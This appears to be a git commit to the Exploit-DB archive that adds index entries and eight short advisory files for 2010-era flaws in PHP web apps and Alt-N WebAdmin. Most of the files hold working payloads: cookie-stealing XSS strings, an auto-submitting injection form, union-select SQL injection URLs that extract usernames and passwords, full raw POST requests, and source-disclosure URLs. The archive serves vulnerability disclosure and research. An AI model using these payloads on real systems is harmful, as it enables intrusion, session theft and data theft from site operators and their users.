Updated 11_01_2014
This commit is contained in:
Offensive Security
parent
63315eaa60
commit
9234afd706
9 changed files with 97 additions and 0 deletions
|
|
@ -31631,3 +31631,11 @@ id,file,description,date,author,platform,type,port
|
|||
35113,platforms/php/webapps/35113.php,"MAARCH 1.4 - Arbitrary File Upload",2014-10-29,"Adrien Thierry",php,webapps,80
|
||||
35114,platforms/php/webapps/35114.txt,"MAARCH 1.4 - SQL Injection",2014-10-29,"Adrien Thierry",php,webapps,80
|
||||
35115,platforms/linux/remote/35115.rb,"CUPS Filter Bash Environment Variable Code Injection",2014-10-29,metasploit,linux,remote,631
|
||||
35116,platforms/php/webapps/35116.txt,"HP Insight Diagnostics Online Edition 8.4 'search.php' CVE-2010-4111 Cross Site Scripting Vulnerability",2010-12-15,"Richard Brain",php,webapps,0
|
||||
35117,platforms/php/webapps/35117.txt,"BLOG:CMS 4.2.1 e Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0
|
||||
35118,platforms/php/webapps/35118.txt,"phpRS 'model-kits.php' SQL Injection Vulnerability",2010-12-16,KnocKout,php,webapps,0
|
||||
35119,platforms/windows/remote/35119.txt,"Alt-N WebAdmin 3.3.3 Remote Source Code Information Disclosure Vulnerability",2010-12-17,wsn1983,windows,remote,0
|
||||
35120,platforms/php/webapps/35120.txt,"Radius Manager 3.6 Multiple Cross Site Scripting Vulnerabilities",2010-12-17,"Rodrigo Rubira Branco",php,webapps,0
|
||||
35121,platforms/php/webapps/35121.txt,"Social Share Multiple Cross Site Scripting Vulnerabilities",2010-12-17,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35122,platforms/php/webapps/35122.txt,"Social Share 'postid' Parameter SQL Injection Vulnerability",2010-12-20,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35123,platforms/php/webapps/35123.txt,"Mafya Oyun Scrpti 'profil.php' SQL Injection Vulnerability",2010-12-20,"DeadLy DeMon",php,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
9
platforms/php/webapps/35116.txt
Executable file
9
platforms/php/webapps/35116.txt
Executable file
|
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/45420/info
|
||||
|
||||
HP Insight Diagnostics Online Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Versions prior to HP Insight Diagnostics Online Edition 8.5.1.3712
|
||||
|
||||
http://www.example.com/hpdiags/frontend2/help/search.php?query="onmouseover="alert(1);
|
||||
27
platforms/php/webapps/35117.txt
Executable file
27
platforms/php/webapps/35117.txt
Executable file
|
|
@ -0,0 +1,27 @@
|
|||
source: http://www.securityfocus.com/bid/45432/info
|
||||
|
||||
BLOG:CMS is prone to a cross-site-scripting vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||
|
||||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
||||
|
||||
BLOG:CMS 4.2.1.e is vulnerable; prior versions may also be affected.
|
||||
|
||||
Cross Site Scripting POCs:
|
||||
|
||||
<form action="http://host/admin/index.php" method="post" name="main">
|
||||
<input type="hidden" name="blogid" value="0">
|
||||
<input type="hidden" name="itemid" value="0">
|
||||
<input type="hidden" name="action" value="browseowncomments">
|
||||
<input type="hidden" name="amount" value='10"><script>alert(document.cookie)</script>'>
|
||||
<input type="hidden" name="start" value="0">
|
||||
<input type="hidden" name="search" value="">
|
||||
</form>
|
||||
<script>
|
||||
document.main.submit();
|
||||
</script>
|
||||
|
||||
|
||||
|
||||
|
||||
http://www.example.com/admin/index.php?action=settingsedit"><script>alert(document.cookie)</script>
|
||||
|
||||
7
platforms/php/webapps/35118.txt
Executable file
7
platforms/php/webapps/35118.txt
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/45467/info
|
||||
|
||||
phpRS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/model-kits.php?akce=model&nazev=zis-3-1942-divisional-gun&id=-32/**/union/**/select/**/1,concat%28user,0x3a,password%29,3,4,5/**/from/**/mac_user--
|
||||
9
platforms/php/webapps/35120.txt
Executable file
9
platforms/php/webapps/35120.txt
Executable file
|
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/45481/info
|
||||
|
||||
Radius Manager is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Radius Manager 3.6.0 is vulnerable; other versions may also be affected
|
||||
|
||||
http:///admin.php?cont=update_usergroup&id=1 POST /admin.php?cont=update_usergroup&id=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http:///admin.php?cont=edit_usergroup&id=1 Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username Content-Type: application/x-www-form-urlencoded Content-Length: 120 name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Update Request 2: http:///admin.php?cont=store_nas POST /admin.php?cont=store_nas HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http:///admin.php?cont=new_nas Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username Content-Type: application/x-www-form-urlencoded Content-Length: 112 name=Name&nasip=10.0.0.1&type=0&secret=1111&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Add+NAS
|
||||
9
platforms/php/webapps/35121.txt
Executable file
9
platforms/php/webapps/35121.txt
Executable file
|
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/45485/info
|
||||
|
||||
Social Share is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/socialshare/save.php?title=<XSS>
|
||||
|
||||
http://www.example.com/socialshare/save.php?url="><XSS>
|
||||
7
platforms/php/webapps/35122.txt
Executable file
7
platforms/php/webapps/35122.txt
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/45497/info
|
||||
|
||||
Social Share is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/socialshare/postview.php? postid=-1 union select 1,2,3,4,5,6,7,8,9,10#
|
||||
7
platforms/php/webapps/35123.txt
Executable file
7
platforms/php/webapps/35123.txt
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/45501/info
|
||||
|
||||
Mafya Oyun Scrpti is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/profil.php?id=[SQL]
|
||||
14
platforms/windows/remote/35119.txt
Executable file
14
platforms/windows/remote/35119.txt
Executable file
|
|
@ -0,0 +1,14 @@
|
|||
source: http://www.securityfocus.com/bid/45476/info
|
||||
|
||||
Alt-N WebAdmin is prone to a remote information-disclosure vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to view the source code of files in the context of the server process; this may aid in further attacks.
|
||||
|
||||
The following versions are affected:
|
||||
|
||||
Alt-N WebAdmin 3.3.3
|
||||
U-Mail 9.8 for Windows
|
||||
U-Mail GateWay 9.8 for Windows
|
||||
|
||||
http://www.example.com/login.wdm%20
|
||||
http://www.example.com/login.wdm%2e
|
||||
Loading…
Add table
Reference in a new issue